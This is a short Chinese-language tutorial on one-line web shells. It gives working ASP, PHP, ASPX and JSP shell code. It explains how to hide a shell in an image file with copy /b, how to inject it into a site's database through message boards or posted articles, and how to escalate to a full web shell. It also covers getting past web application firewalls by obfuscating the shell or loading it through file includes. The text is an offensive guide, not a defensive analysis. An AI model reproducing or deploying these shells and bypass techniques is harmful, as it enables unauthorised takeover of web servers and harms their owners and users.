一句话木马
asp:<%eval request("heroes")%>
php:<?php @eval($_POST[12345]);?>
aspx:<%@ Page Language="Jscript"%><%eval(Request.Item["12345"],"unsafe");%>
jsp:<% if(request.getParameter(“f”)!=null)(new java.io.FileOutputStream(application.getRealPath("/")+request.getParameter(“f”))).write(request.getParameter(“t”).getBytes());%> //保存为1.jsp,提交url为 http://localhost/1.jsp?f=1.txt&;t=hello,访问http://localhost/1.txt 出来hello
- 制作方法:
1.C32直接写入
2.cmd下copy /b 1.jpg+1.asp 2.jpg
3.右键属性版权内插入(隐蔽性不高)
过程(这里以asp为例)
1.找到数据库是asp格式的网站,然后以留言板或发表文章的方式把一句话木马添加到asp数据库或加进网页
2.我们的目的就是把他写入数据库,无论什么方式
3.打开客户端(就是电脑上那个htm文件),填上加入了一句话的asp文件或者asp网页,然后进入服务器
通过一句话木马利用工具继续传小马
通过小马传大马
大马就是这种效果
使用加密过waf
1.到网上找加密文件给一句话加一下密
2.过狗一句话原理:通过打乱变量,用函数进行重新组合成一句话木马,从而绕过waf
使用包含过waf
- 各种类型的包含代码可以到网上查
这里上传两个文件,bao.asp和1.jpg(木马)
bao.asp:<?–#include file=“1.jpg”–> - 因为1.jpg是图片格式,所以代码不执行,去执行bao.asp,而bao.asp又将1.jpg(也就是木马)当做asp执行
